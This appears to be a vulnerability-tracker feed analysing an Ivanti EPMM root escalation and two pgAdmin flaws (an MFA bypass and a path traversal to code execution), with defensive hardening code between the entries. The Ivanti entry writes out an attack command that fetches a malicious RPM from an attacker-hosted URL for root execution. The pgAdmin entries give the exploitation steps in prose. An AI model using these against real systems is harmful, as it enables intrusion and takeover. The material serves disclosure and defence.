Activity Feed

Ratings
  • Attacker Value
    High
  • Exploitability
    Medium
Technical Analysis

CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.

The appliance uses the following command to fetch and install RPM packages as a low-privilege user. This of course means you must have CLI access:

install rpm url <remote url>

The above command is only a CLI wrapper for the following, which runs as root:

/bin/rpm -Uvh *.rpm

This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.

So you can root the appliance by hosting a malicious RPM with whatever commands you want, then fetch it using the standard update command on the Ivanti EPMM CLI, and your commands will run as root.

install rpm url http://<attacker_IP>/malicious.rpm

I have provided a POC here:
https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core
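The two controls the analysis says the wrapper lacks (source filtering and signature verification) are what a hardened update wrapper has to add before handing anything to rpm. This is a constructed example, not Ivanti's code; the allowlisted host and the sample `rpm -Kv` output are assumptions, and it assumes the vendor signing key was already imported with `rpm --import`.

```python
"""Hardened stand-in for an "install rpm url <url>" wrapper (constructed
example, not Ivanti's code). Instead of passing whatever the URL serves
straight to `rpm -Uvh`, it allowlists the source and requires a valid GPG
signature. Assumes the vendor key was imported with `rpm --import`."""
import os
import subprocess
import tempfile
from urllib.parse import urlsplit

ALLOWED_UPDATE_HOSTS = {"updates.example.com"}   # constructed allowlist

# Constructed samples mirroring the shape of `rpm -Kv` output.
SAMPLE_SIGNED = ("pkg.rpm:\n"
                 "    Header V4 RSA/SHA256 Signature, key ID 0608b895: OK\n"
                 "    Header SHA256 digest: OK\n"
                 "    V4 RSA/SHA256 Signature, key ID 0608b895: OK\n"
                 "    MD5 digest: OK\n")
SAMPLE_UNSIGNED = ("pkg.rpm:\n"
                   "    Header SHA256 digest: OK\n"
                   "    Payload SHA256 digest: OK\n"
                   "    MD5 digest: OK\n")


def validate_rpm_url(url: str) -> bool:
    """Accept only https URLs to an allowlisted host that name an .rpm file."""
    parts = urlsplit(url)
    return (parts.scheme == "https"
            and parts.hostname in ALLOWED_UPDATE_HOSTS
            and parts.path.endswith(".rpm"))


def rpm_signature_ok(checksig_output: str) -> bool:
    """Judge `rpm -Kv` output: at least one Signature line must be present and
    every check line must end in OK, so unsigned, NOKEY and BAD packages fail."""
    checks = [l.strip() for l in checksig_output.splitlines() if ": " in l]
    if not any("Signature" in c for c in checks):
        return False
    return all(c.endswith(": OK") for c in checks)


def install_rpm_from_url(url: str) -> int:
    """Fetch, verify, then install; returns rpm's exit code, or 1 on refusal."""
    if not validate_rpm_url(url):
        return 1
    with tempfile.TemporaryDirectory() as tmp:
        pkg = os.path.join(tmp, "update.rpm")
        fetch = subprocess.run(["curl", "-fsSL", "--proto", "=https",
                                "--max-redirs", "0", "-o", pkg, url])
        if fetch.returncode != 0:
            return 1
        sig = subprocess.run(["rpm", "-Kv", pkg], capture_output=True, text=True)
        if not rpm_signature_ok(sig.stdout):
            return 1
        return subprocess.run(["rpm", "-Uvh", pkg]).returncode
```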

Technical Analysis

Rapid7 pen testers have noted they have encountered vulnerable versions of this software on engagements.

Technical Analysis

pgAdmin is vulnerable to a multi-factor authentication bypass (CWE-287) whereby an attacker with knowledge of an account’s credentials can manage files and make SQL queries regardless of whether or not the account has been configured with MFA. This vulnerability has a CVSS v3 score of 6.4 with a vector of AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N.

Exploitation

An attacker with knowledge of a legitimate account’s username and password may authenticate to the application and perform sensitive actions within the application, such as managing files and executing SQL queries regardless of the account’s MFA enrollment status.

pgAdmin4 is a rewrite of the original application in Python and has evolved into pgAdmin4 version 8.5 (the latest version as of when this vulnerability was discovered). The application is written using the Flask web framework and uses common Flask patterns such as blueprints, which are web application components that may include one or more resource handlers called “views”.

Upon normal authentication, an MFA-enabled user is granted a session without the mfa_authenticated key. pgAdmin then offers an mfa_required decorator that must be applied to individual Flask views in order to be protected. Once the username and password are validated, the session object itself is valid, meaning each view must opt into MFA authentication as opposed to being required to create a valid and authenticated session. The main view of the browser blueprint opts into MFA authentication. The /browser/ resource is the default location a newly authenticated user is redirected to. When this view is rendered by Flask, the MFA authentication status is checked and the user is prompted to enter their OTP.

If, however, the user has automated the necessary HTTP requests, there is nothing stopping them from using their authenticated session and accessing other parts of the application including the file manager and SQL editor blueprints. These two resources, along with others, only require an authenticated session, effectively ignoring the account’s MFA requirement.

Impact

An attacker is able to leverage an MFA-enabled account with only knowledge of its username and password to execute SQL queries and manage files. It should be noted that the file manager does not have full access to the root file system by default but is commonly used to store SQL-related data files.

This vulnerability was fixed in pgAdmin 8.6 by commit f4761f5.
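The opt-in model described above (a decorator each view must remember to apply) is what lets the SQL editor and file manager views skip the OTP check. The following constructed example, not pgAdmin's code, models that pattern beside a before-request hook that gates every non-exempt endpoint; it imitates Flask dispatch with a plain dict so it runs without Flask, and the user names, endpoint paths and the exempt list are assumptions.

```python
"""Model of pgAdmin's opt-in MFA check beside a global enforcement hook
(constructed example, not pgAdmin's code; it imitates Flask dispatch with a
dict of endpoint -> view so it runs without Flask). Views return
(status, body) like a simplified Flask response."""
from functools import wraps

MFA_ENROLLED = {"alice"}                    # constructed: alice has MFA configured
MFA_EXEMPT = {"/login", "/mfa/validate"}    # endpoints that must stay reachable


def needs_otp(session: dict) -> bool:
    """True when the user is enrolled but this session never completed MFA."""
    return session["user"] in MFA_ENROLLED and not session.get("mfa_authenticated")


def mfa_required(view):
    """Opt-in decorator: only views wrapped with it check the MFA flag."""
    @wraps(view)
    def wrapper(session):
        if needs_otp(session):
            return 302, "/mfa/validate"
        return view(session)
    return wrapper


@mfa_required
def browser(session):          # the default post-login redirect target
    return 200, "browser for " + session["user"]


def sqleditor(session):        # only requires an authenticated session
    return 200, "query executed for " + session["user"]


def file_manager(session):     # likewise
    return 200, "file listing for " + session["user"]


def mfa_validate(session):
    return 200, "enter OTP"


VIEWS = {"/browser/": browser, "/sqleditor/query": sqleditor,
         "/file_manager/": file_manager, "/mfa/validate": mfa_validate}


def dispatch_opt_in(path: str, session: dict):
    """Vulnerable model: each view decides for itself whether to check MFA."""
    return VIEWS[path](session)


def dispatch_enforced(path: str, session: dict):
    """Hardened model: one hook gates every non-exempt endpoint before the
    view runs, so a view cannot forget to opt in."""
    if path not in MFA_EXEMPT and needs_otp(session):
        return 302, "/mfa/validate"
    return VIEWS[path](session)
```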

Ratings
  • Attacker Value
    High
  • Exploitability
    Medium
Technical Analysis

pgAdmin versions <=8.3 are vulnerable to a path traversal vulnerability in the session handling logic. This can be leveraged by an attacker to load a malicious serialized object and execute Python code within the context of the application. On Linux servers, this requires the ability to write files to the target. pgAdmin has a file management component that is available by default for users. With a known username and password, a user can authenticate to pgAdmin, upload a malicious object, and trigger code execution through the path traversal vulnerability. It should be noted that CVE-2024-4215 affects a superset of pgAdmin versions and, therefore, an attacker would be able to leverage an account regardless of its MFA enrollment status.

When targeting Windows servers, the vulnerability can lead to code execution by using a UNC path in place of the path traversal. Insecure outbound guest access was disabled by default in Windows 10 v1709 (Redstone 3). To leverage this technique, the target would either need to be an older system, or have guest access explicitly enabled. Alternatively, Windows servers can also be exploited by using the same file management functionality provided by pgAdmin.

This vulnerability was fixed in commit 4e49d75.
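The root cause described in this analysis is a client-controlled session identifier being joined onto the session directory without validation, which on Linux allows traversal and on Windows allows a UNC path. The constructed example below, not pgAdmin's code, shows the traversal-prone join beside a resolver that validates the id format and confirms the resolved path stays inside the directory; the session id format and directory are assumptions.

```python
"""Hardened session-id to file path resolution (constructed example, not
pgAdmin's code). Server-side sessions are stored one file per id under a
base directory; the id comes from the client's cookie, so it must never steer
the lookup outside that directory or, on Windows, to a UNC share."""
import os
import re

# Assumption: session ids are 32 lowercase hex characters.
SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")


def unsafe_session_path(base_dir: str, sid: str) -> str:
    """The traversal-prone pattern: whatever the cookie says is joined verbatim.
    A naive startswith(base_dir) check on the result still passes for '../'."""
    return os.path.join(base_dir, sid)


def safe_session_path(base_dir: str, sid: str) -> str:
    """Return the file for sid, or raise ValueError if the id is malformed or
    the resolved path escapes base_dir (covers ../, absolute and UNC forms)."""
    if not SESSION_ID_RE.fullmatch(sid):
        raise ValueError("malformed session id")
    root = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(root, sid))
    # Defence in depth: even a valid-looking id must resolve under root.
    if os.path.commonpath([root, path]) != root:
        raise ValueError("session path escapes session directory")
    return path


def load_session_file(base_dir: str, sid: str) -> bytes:
    """Read the session file only through the validated path; returns b'' if
    the session does not exist rather than touching anything outside root."""
    path = safe_session_path(base_dir, sid)
    if not os.path.isfile(path):
        return b""
    with open(path, "rb") as fh:
        return fh.read()
```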